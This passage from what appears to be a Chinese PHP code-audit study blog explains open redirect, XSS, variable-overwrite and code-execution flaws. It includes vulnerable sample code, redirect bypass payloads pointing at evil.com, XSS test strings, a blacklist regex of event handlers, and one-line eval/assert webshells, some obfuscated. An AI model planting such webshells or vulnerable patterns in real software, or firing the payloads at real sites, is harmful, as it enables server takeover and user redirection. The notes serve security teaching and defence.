class="line">$mysqli_stmt-&gt;close();</span><br><span class="line">$mysqli-&gt;close();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="URL跳转漏洞"><a href="#URL跳转漏洞" class="headerlink" title="URL跳转漏洞"></a>URL跳转漏洞</h1><p><strong>1.URL任意跳转:</strong></p>
<p>未做任何限制，传入任何网址即可进行跳转:<br>漏洞示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">  $redirect_url &#x3D; $_GET[&#39;url&#39;];</span><br><span class="line">  header(&quot;Location: &quot; . $redirect_url);</span><br><span class="line">  exit;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Payload：?url=<a href="http://www.baidu.com，即可跳转到百度首页" target="_blank" rel="noopener">http://www.baidu.com，即可跳转到百度首页</a></strong></p>
<p><strong>2.编码解码:</strong></p>
<p><strong>比如base64解码:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">  $url &#x3D; base64_decode($_GET[&#39;url&#39;]);</span><br><span class="line">  header(&quot;Location: &quot; . $url);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Paylod：?url=aHR0cDovL3d3dy5iYWlkdS5jb20=</strong></p>
<p><strong>3.常见的绕过姿势:</strong></p>
<p><strong>利用默认协议:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?url&#x3D;\\www.baidu.com</span><br><span class="line">?url&#x3D;\&#x2F;www.baidu.com</span><br><span class="line">?url&#x3D;\\\\www.baidu.com     等价于：?url&#x3D;http:&#x2F;&#x2F;www.baidu.com</span><br></pre></td></tr></table></figure>

<p><strong>前缀式:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用问号?： ?url&#x3D;http:&#x2F;&#x2F;www.evil.com?www.aaa.com</span><br><span class="line">利用井号#： http:&#x2F;&#x2F;www.aaa.com?returnUrl&#x3D;http:&#x2F;&#x2F;www.evil.com#www.aaa.com</span><br></pre></td></tr></table></figure>

<p><strong>其他形式:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?url&#x3D;http:&#x2F;&#x2F;www.baidu.com\aaa.com</span><br><span class="line">?url&#x3D;http:&#x2F;&#x2F;www.baidu.com\\aaa.com</span><br></pre></td></tr></table></figure>

<p><strong>后缀式:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用@符号：?url&#x3D;http:&#x2F;&#x2F;www.aaa.com@www.evil.com</span><br><span class="line">其他形式： http:&#x2F;&#x2F;www.aaa.com.evil.com</span><br></pre></td></tr></table></figure>

<p><strong>其他思路:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">使用IP地址、IPv6地址、更换ftp、gopher协议</span><br></pre></td></tr></table></figure>

<p><strong>4.白名单限制绕过:</strong></p>
<p><strong>白名单限制:</strong><br>比如:<br>?redirect_uri=<a href="http://www.baidu.com" target="_blank" rel="noopener">http://www.baidu.com</a><br>尝试进行跳转到其他网站时发现做了白名单限制，非QQ域名禁止跳转，会报错说跳转链接非法</p>
<p><strong>利用问号绕过限制:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?redirect_uri&#x3D;http:&#x2F;&#x2F;www.baidu.com</span><br><span class="line">?redirect_uri&#x3D;http:&#x2F;&#x2F;www.qq.com?http:&#x2F;&#x2F;www.baidu.com</span><br><span class="line">?redirect_uri&#x3D;http:&#x2F;&#x2F;www.baidu.com?&amp;http:&#x2F;&#x2F;www.qq.com</span><br><span class="line">?redirect_uri&#x3D;http:&#x2F;&#x2F;www.baidu.com&#x2F;test.html?&amp;http:&#x2F;&#x2F;www.qq.com</span><br><span class="line">?redirect_uri&#x3D;http:&#x2F;&#x2F;www.baidu.com\test.html?&amp;http:&#x2F;&#x2F;www.qq.com</span><br></pre></td></tr></table></figure>

<p><strong>在代码中判断是否为目标域名，但开发小哥哥们喜欢用字符串包含来判断</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;下面的语句都返回&quot;http:&#x2F;&#x2F;www.aaa.com.evil.com&quot;</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;www.aaa.com?returnUrl&#x3D;http:&#x2F;&#x2F;www.aaa.com.evil.com</span><br><span class="line">http:&#x2F;&#x2F;www.aaa.com?returnUrl&#x3D;http:&#x2F;&#x2F;www.evil.com&#x2F;www.aaa.com</span><br><span class="line">http:&#x2F;&#x2F;www.aaa.com?returnUrl&#x3D;http:&#x2F;&#x2F;www.xxxaaa.com</span><br></pre></td></tr></table></figure>

<p><strong>利用反斜线:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.aaa.com?returnUrl&#x3D;http:&#x2F;&#x2F;www.evil.comwww.aaa.com</span><br><span class="line">http:&#x2F;&#x2F;www.aaa.com?returnUrl&#x3D;http:&#x2F;&#x2F;www.evil.com\www.aaa.com</span><br><span class="line">多次跳转,即aaa公司信任ccc公司，ccc公司同样存在漏洞或者提供跳转服务:</span><br><span class="line">http:&#x2F;&#x2F;www.aaa.com?returnUrl&#x3D;http:&#x2F;&#x2F;www.ccc.com?jumpto&#x3D;http:&#x2F;&#x2F;www.evil.com</span><br><span class="line">实际挖掘过程中还可以将上述方法混合使用，甚至使用URL编码、ip地址替代域名等手段。</span><br></pre></td></tr></table></figure>

<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="XSS漏洞"><a href="#XSS漏洞" class="headerlink" title="XSS漏洞"></a>XSS漏洞</h1><p><strong>1.基本xss:</strong></p>
<p>漏洞代码示例:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  echo $_REQUEST[ &#39;id&#39; ];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>测试语句: ?id=&lt;script&gt;alert(/xss/)&lt;/script&gt;</p>
<p><strong>2.编码解码:</strong></p>
<p><strong>编码解码输出时，可能导致XSS编码绕过的情况</strong><br>漏洞代码示例:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a&#x3D;urldecode($_GET[&#39;id&#39;]); &#x2F;&#x2F;接收参数并进行url解码</span><br><span class="line">$b&#x3D;htmlspecialchars($a);   &#x2F;&#x2F;HTML ENCODE处理,到这里都是没有问题的</span><br><span class="line">echo urldecode($b);       &#x2F;&#x2F;最后，url解码输出</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>测试语句： id=%25253Cscript%25253Ealert(/xss/)%25253C/script%25253E</strong><br>这边代码逻辑中，问题根源在于<strong>最后一句的url解码输出，导致存在三重url编码绕过</strong>的情况。<br>根据实际情况，给出安全建议：HTML ENCODE处理后直接输出变量。</p>
<p><strong>3.HTML不规范:</strong></p>
<p>HTML代码编写不规范，可能导致的问题，我们来看一个案例：<br>漏洞代码示例:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  $name &#x3D; htmlspecialchars($_GET[&#39;name&#39;]);</span><br><span class="line">?&gt;</span><br><span class="line">&lt;input type&#x3D;&#39;text&#39; class&#x3D;&#39;search&#39; value&#x3D;&#39;&lt;?&#x3D;$name?&gt;&#39;&gt;</span><br></pre></td></tr></table></figure>

<p>获取参数，在一个input元素的属性里输出这个变量，我们注意到这里使用的是单引号闭合，<br>而<strong>htmlspecialchars函数默认只是转化双引号(“), 不对单引号(‘)做转义,因此可以用单引号闭合</strong><br><strong>测试语句：?name=222’ onclick=’alert(/xxs/)</strong><br>安全建议：将HTML标签的属性值用双引号引起来</p>
<p><strong>4.绕过黑名单过滤:</strong></p>
<p>通过在全局引入过滤函数，提供黑名单过滤，<br>漏洞代码示例:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  $name &#x3D; htmlspecialchars($_GET[&#39;name&#39;]);</span><br><span class="line">  $pregs &#x3D; &quot;&#x2F;&lt;script&gt;|</span><br><span class="line">&lt;\&#x2F;script&gt;|onclick|oncontextmenu|ondblclick|onmousedown|onmouseenter|onmouseleave|onmousemo</span><br><span class="line">ve|onmouseover|onmouseout|onmouseup|onkeydown|onkeypress|onkeyup&#x2F;i&quot;;</span><br><span class="line">  $check &#x3D; preg_match($pregs, $name);</span><br><span class="line">  if ($check) &#123;</span><br><span class="line">          echo &#39;not found&#39;;</span><br><span class="line">          exit;</span><br><span class="line">  &#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;input type&#x3D;&#39;text&#39; class&#x3D;&#39;search&#39; value&#x3D;&#39;&lt;?&#x3D;$name?&gt;&#39;&gt;</span><br></pre></td></tr></table></figure>

<p>从html编写不规范，我们可以使用单引号闭合，然后去进一步构造触发事件，可是常见的XSS事件大多都被过滤了，<br>怎么快速地去找到可以拿来利用的XSS触发事件呢? 答：XSS FUZZ。<br>前提是要收集积累一些触发事件，利用自己编写python脚本进行fuzz,或者使用前辈写的一些工具</p>
<p>例如:<br><strong>XSStrike:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;s0md3v&#x2F;XSStrike</span><br></pre></td></tr></table></figure>

<p><strong>其他涉及资源详见:[WAF绕过]XSS篇</strong></p>
<p><strong>5.漏洞防护:</strong></p>
<p>1.<strong>PHP提供了两个函数htmlentities()和htmlspecialchars() ，把一些预定义的字符转换为 HTML 实体。</strong><br>防御代码示例:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php    </span><br><span class="line">  echo htmlspecialchars($_REQUEST[ &#39;id&#39; ]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>2.<strong>其它的通用的补充性防御手段</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.在输出html时，加上Content Security Policy的Http Header</span><br><span class="line">（作用：可以防止页面被XSS攻击时，嵌入第三方的脚本文件等）</span><br><span class="line">（缺陷：IE或低版本的浏览器可能不支持）</span><br><span class="line"></span><br><span class="line">2.在设置Cookie时，加上HttpOnly参数</span><br><span class="line">（作用：可以防止页面被XSS攻击时，Cookie信息被盗取，可兼容至IE6）</span><br><span class="line">（缺陷：网站本身的JS代码也无法操作Cookie，而且作用有限，只能保证Cookie的安全）</span><br><span class="line"></span><br><span class="line">3.在开发API时，检验请求的Referer参数</span><br><span class="line">（作用：可以在一定程度上防止CSRF攻击）</span><br><span class="line">（缺陷：IE或低版本的浏览器中，Referer参数可以被伪造）</span><br></pre></td></tr></table></figure>

<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="变量覆盖漏洞"><a href="#变量覆盖漏洞" class="headerlink" title="变量覆盖漏洞"></a>变量覆盖漏洞</h1><p><strong>0.前言:</strong></p>
<p>变量覆盖指的是用我们自定义的参数值替换程序原有的变量值，一般变量覆盖漏洞需要结合程序的其它功能来实现完整的攻击。<br>经常导致变量覆盖漏洞场景有：$$，extract()函数，parse_str()函数，import_request_variables()使用不当，开启了全局变量注册等</p>
<p><strong>1.全局变量覆盖:</strong></p>
<p>register_globals的意思就是注册为全局变量，所以当On的时候，传递过来的值会被直接的注册为全局变量直接使用，而Off的时候，我们需要到特定的数组里去得到它</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">&#x2F;&#x2F;?id&#x3D;1</span><br><span class="line">echo &quot;Register_globals: &quot;.(int)ini_get(&quot;register_globals&quot;).&quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">echo &#39;$_GET[&quot;id&quot;] :&#39;.$_GET[&#39;id&#39;].&quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">echo &#39;$id :&#39;.$id;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>当register_globals=Off的时候，下一个程序接收的时候应该用$_GET[‘id’]来接受传递过来的值；<br>当register_globals=On的时候，下一个程序可以直接使用id 来接受值，也可以用_GET[‘id’]来接受传递过来的值。<br>tips：如果上面的代码中，已经对变量id赋了初始值，比如id=0,那么即使在URL中有/test.php?id=1，也不会将变量覆盖，id值为0</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">echo &quot;Register_globals: &quot;.(int)ini_get(&quot;register_globals&quot;).&quot;&lt;br&#x2F;&gt;&quot;;</span><br><span class="line">if (ini_get(&#39;register_globals&#39;)) foreach($_REQUEST as $k&#x3D;&gt;$v) unset($&#123;$k&#125;);  </span><br><span class="line">print $a.&quot;&lt;br&#x2F;&gt;&quot;;  </span><br><span class="line">print $_GET[b];  </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>在register_globals=ON时,<br>提交/test.php?a=1&amp;b=2,变量a 未初始化,_GET[b]=2<br>提交/test.php??GLOBALS[a]=1&amp;b=2,a=1,_GET[b]=2</p>
<p>(tips: 从 PHP » 4.2.0 版开始配置文件中 PHP 指令 register_globals 的默认值从 on 改为 off 了,自 PHP 5.3.0 起废弃<br>并将自 PHP 5.4.0 起移除)</p>
<p><strong>2.$导致的变量覆盖漏洞:</strong></p>
<p>使用foreach来遍历数组中的值，然后再将获取到的数组键名作为变量，数组中的键值作为变量的值。因此就产生了变量覆盖漏洞.<br>请求?id=1 会将id的值覆盖,id=1.</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">foreach (array(&#39;_COOKIE&#39;,&#39;_POST&#39;,&#39;_GET&#39;) as $_request)  </span><br><span class="line">&#123;</span><br><span class="line">  foreach ($$_request as $_key&#x3D;&gt;$_value)  </span><br><span class="line">  &#123;</span><br><span class="line">      $$_key&#x3D; $_value;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">$id &#x3D; isset($id) ? $id : 2;</span><br><span class="line">if($id &#x3D;&#x3D; 1) &#123;</span><br><span class="line">  echo &quot;flag&#123;xxxxxxxxxx&#125;&quot;;</span><br><span class="line">  die();</span><br><span class="line">&#125;</span><br><span class="line">echo $id;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>3. extract()变量覆盖:</strong></p>
<p>extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名，使用数组键值作为变量<br>值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。<br>用法:<br><a href="http://www.w3school.com.cn/php/func_array_extract.asp" target="_blank" rel="noopener">http://www.w3school.com.cn/php/func_array_extract.asp</a></p>
<p>示例代码1:<br>将键值 “Cat”、”Dog” 和 “Horse” 赋值给变量 、 b 和 $c：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a &#x3D; &quot;Original&quot;;</span><br><span class="line">$my_array &#x3D; array(&quot;a&quot; &#x3D;&gt; &quot;Cat&quot;,&quot;b&quot; &#x3D;&gt; &quot;Dog&quot;, &quot;c&quot; &#x3D;&gt; &quot;Horse&quot;);</span><br><span class="line">extract($my_array);</span><br><span class="line">echo &quot;\$a &#x3D; $a; \$b &#x3D; $b; \$c &#x3D; $c&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&#x2F;&#x2F;运行结果：$a &#x3D; Cat; $b &#x3D; Dog; $c &#x3D; Horse</span><br></pre></td></tr></table></figure>

<p>示例代码2:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$id&#x3D;1;  </span><br><span class="line">extract($_GET);</span><br><span class="line">echo $id;</span><br><span class="line">?&gt;</span><br><span class="line">&#x2F;&#x2F;提交：?id&#x3D;123</span><br><span class="line">&#x2F;&#x2F;结果： 123</span><br></pre></td></tr></table></figure>

<p>(在调用extract()时使用EXTR_SKIP保证已有变量不会被覆盖 extract($_GET,EXTR_SKIP);)</p>
<p><strong>4. parse_str()变量覆盖:</strong></p>
<p>parse_str() 函数把查询字符串解析到变量中，如果没有array 参数，则由该函数设置的变量将覆盖已存在的同名<br>变量.<br>用法:<br><a href="http://www.w3school.com.cn/php/func_string_parse_str.asp" target="_blank" rel="noopener">http://www.w3school.com.cn/php/func_string_parse_str.asp</a></p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">parse_str(&quot;a&#x3D;1&quot;);</span><br><span class="line">echo $a.&quot;&lt;br&#x2F;&gt;&quot;;     &#x2F;&#x2F;$a&#x3D;1</span><br><span class="line">parse_str(&quot;b&#x3D;1&amp;c&#x3D;2&quot;,$myArray);</span><br><span class="line">print_r($myArray);   &#x2F;&#x2F;Array ( [c] &#x3D;&gt; 1 [b] &#x3D;&gt; 2 )</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>parse_str()类似的函数还有mb_parse_str()，用法基本一致</p>
<p><strong>5.import_request_variables变量覆盖:</strong></p>
<p>import_request_variables 函数可以在 register_global = off 时，把 GET/POST/Cookie 变量导入全局作用域<br>中</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">import_request_variables(&quot;g&quot;, &quot;get_&quot;);</span><br><span class="line">echo $get_id;</span><br><span class="line">?&gt;</span><br><span class="line">&#x2F;&#x2F;提交：?id&#x3D;111</span><br><span class="line">&#x2F;&#x2F;结构：111</span><br></pre></td></tr></table></figure>

<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="代码执行漏洞"><a href="#代码执行漏洞" class="headerlink" title="代码执行漏洞"></a>代码执行漏洞</h1><p><strong>1.漏洞案例:</strong></p>
<p>漏洞形成原因：客户端提交的参数，未经任何过滤，传入可以执行代码的函数，造成代码执行漏洞.</p>
<p>常见函数:<br><strong>eval、preg_replace+/e、assert、call_user_func、call_user_func_array、create_function</strong>等函数</p>
<p>漏洞危害：执行代码，写入webshell、控制服务器</p>
<p>简单举例:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?cmd&#x3D;phpinfo();</span><br><span class="line">@eval($_GET[&#39;cmd&#39;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>2.常见代码执行函数:</strong></p>
<p>比如:<br><strong>eval()、assert()、preg_replace()、create_function(),array_map()、call_user_func()、call_user_func_array()，array_filter，usort，uasort()，文件操作函数、动态函数(a(b))</strong></p>
<p><strong>eval()</strong>:</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eval($_POST[cmd])?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>assert()</strong>:</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?cmd&#x3D;phpinfo()</span><br><span class="line">assert($_REQUEST[cmd]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>preg_replace()</strong>:</p>
<p>preg_replace(pattern,replacement,subject);<br>搜索subject中匹配pattern的部分，以replacement进行替换.<br>preg_replace()函数原本是执行一个正则表达式的搜索和替换，但因为存在危险的/e修饰符，使 preg_replace()将 replacement 参数当作 PHP 代码</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">@preg_replace(&quot;&#x2F;abc&#x2F;e&quot;,$_REQUEST[&#39;cmd&#39;],&quot;abcd&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>create_function()</strong>:<br>create_function主要用来创建匿名函数，如果没有严格对参数传递进行过滤，攻击者可以构造特殊字符串传递给create_function()执行任意命令.<br>详见:<a href="https://paper.seebug.org/94/#_2" target="_blank" rel="noopener">https://paper.seebug.org/94/#_2</a></p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?cmd&#x3D;phpinfo();</span><br><span class="line">$func &#x3D;create_function(&#39;&#39;,$_REQUEST[&#39;cmd&#39;]);</span><br><span class="line">$func();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>array_map()</strong>:        [这个没用过,找时间学习下]<br>array_map() 函数将用户自定义函数作用到数组中的每个值上，并返回用户自定义函数作用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致.</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?func&#x3D;system&amp;cmd&#x3D;whoami</span><br><span class="line">$func&#x3D;$_GET[&#39;func&#39;];</span><br><span class="line">$cmd&#x3D;$_GET[&#39;cmd&#39;];</span><br><span class="line">$array[0]&#x3D;$cmd;</span><br><span class="line">$new_array&#x3D;array_map($func,$array);</span><br><span class="line">&#x2F;&#x2F;print_r($new_array);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>call_user_func()    /   call_user_func_array()</strong>:<br>call_user_func — 把第一个参数作为回调函数调用,其余参数是回调函数的参数.<br>call_user_func_array — 调用回调函数，并把一个数组参数作为回调函数的参数.</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?cmd&#x3D;phpinfo()</span><br><span class="line">@call_user_func(assert,$_GET[&#39;cmd&#39;]);</span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?cmd&#x3D;phpinfo()</span><br><span class="line">$cmd&#x3D;$_GET[&#39;cmd&#39;];</span><br><span class="line">$array[0]&#x3D;$cmd;</span><br><span class="line">call_user_func_array(&quot;assert&quot;,$array);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>array_filter()</strong>:         [这个没用过,找时间学习下]<br>依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true，则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变</p>
<p>参考链接:<a href="https://www.cnblogs.com/zhouguowei/p/5035393.html" target="_blank" rel="noopener">https://www.cnblogs.com/zhouguowei/p/5035393.html</a><br>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?func&#x3D;system&amp;cmd&#x3D;whoami</span><br><span class="line">$cmd&#x3D;$_GET[&#39;cmd&#39;];</span><br><span class="line">$array1&#x3D;array($cmd);</span><br><span class="line">$func &#x3D;$_GET[&#39;func&#39;];</span><br><span class="line">array_filter($array1,$func);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>usort()、uasort()</strong>:      [这两个没用过,找时间学习下]</p>
<p>usort() 通过用户自定义的比较函数对数组进行排序。<br>uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联.</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">php环境&gt;&#x3D;5.6才能用</span><br><span class="line">&lt;?php usort(...$_GET);?&gt;</span><br><span class="line">利用方式：</span><br><span class="line">test.php?1[]&#x3D;1-1&amp;1[]&#x3D;eval($_POST[&#39;x&#39;])&amp;2&#x3D;assert</span><br><span class="line">[POST]:x&#x3D;phpinfo();</span><br><span class="line">php环境&gt;&#x3D;&lt;5.6才能用</span><br><span class="line">&lt;?php usort($_GET,&#39;asse&#39;.&#39;rt&#39;);?&gt;</span><br><span class="line">利用方式：</span><br><span class="line">test.php?1&#x3D;1+1&amp;2&#x3D;eval($_POST[x])</span><br><span class="line">[POST]:x&#x3D;phpinfo();</span><br></pre></td></tr></table></figure>

